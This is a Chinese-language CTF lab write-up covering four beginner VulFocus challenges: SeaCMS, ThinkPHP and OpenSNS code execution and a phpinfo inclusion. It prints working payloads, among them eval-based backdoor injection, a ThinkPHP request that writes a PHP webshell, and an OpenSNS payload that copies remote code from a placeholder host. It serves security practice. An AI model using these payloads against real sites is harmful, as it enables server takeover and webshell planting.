漏洞指北-VulFocus靶场专栏-初级01

漏洞指北-VulFocus靶场专栏-初级

  • 初级001 海洋CMS代码执行(CNVD-2020-22721
        • step1:进入后台页面 账号密码:admin amdin
        • step2:点击系统,点击后台IP安全设置,关闭
        • step3 启动burpsuite,启动代理,抓请求包
        • step4 http请求包中加入后门,等200 的响应状态码
        • step5 200OK ,进入admin页面,寻找flag,结束
  • 初级002 thinkphp 代码执行 (CNVD-2018-24942)
        • 方法1:构造payload远程代码执行,输入ls /tmp指令
        • 方法2: 构造一句话木马
        • result:探囊取物
  • 初级003 phpinfo-inclusion 文件写入
        • step1 去指定地址的phpinfo.php文件夹下面
        • step2 获取信息后 寻找flag
  • 初级004 opensns 命令执行 (CNVD-2021-34590
        • step1 构造网页的payload即可
        • 方案2 hackbar

初级001 海洋CMS代码执行(CNVD-2020-22721

原因
命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
解决方案:

step1:进入后台页面 账号密码:admin amdin

http://10.11.12.28:17302/manager/login.php
漏洞指北-VulFocus靶场专栏-初级01_第1张图片

step2:点击系统,点击后台IP安全设置,关闭

拼接指令cmd = ls /tmp
cmd就是执行shell的命令
常见的flag一般都是在/tmp页面下
注意‘ ’的符号是%20 ,后面玩捉迷藏有时候会用到这个点。
漏洞指北-VulFocus靶场专栏-初级01_第2张图片

step3 启动burpsuite,启动代理,抓请求包

漏洞指北-VulFocus靶场专栏-初级01_第3张图片

step4 http请求包中加入后门,等200 的响应状态码

v=0&ip=+11111111111";phpinfo();eval($_POST[cmd]);//漏洞指北-VulFocus靶场专栏-初级01_第4张图片

step5 200OK ,进入admin页面,寻找flag,结束

http://10.11.12.28:17302/manager/admin_ip.php
漏洞指北-VulFocus靶场专栏-初级01_第5张图片

初级002 thinkphp 代码执行 (CNVD-2018-24942)

原因:
由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

解决方案:

方法1:构造payload远程代码执行,输入ls /tmp指令

http://10.11.12.28:24050/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp
在这里插入图片描述

方法2: 构造一句话木马

http://10.11.12.28:24050/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E
漏洞指北-VulFocus靶场专栏-初级01_第6张图片

result:探囊取物

漏洞指北-VulFocus靶场专栏-初级01_第7张图片

初级003 phpinfo-inclusion 文件写入

原因
phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件,然后读取从而getshell

step1 去指定地址的phpinfo.php文件夹下面

http://10.11.12.28:20756/phpinfo.php

step2 获取信息后 寻找flag

漏洞指北-VulFocus靶场专栏-初级01_第8张图片

初级004 opensns 命令执行 (CNVD-2021-34590

原因
OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限

step1 构造网页的payload即可

http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
漏洞指北-VulFocus靶场专栏-初级01_第9张图片

方案2 hackbar

http://10.11.12.28:61968/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)

你可能感兴趣的:(VulFocus漏洞指北,网络安全)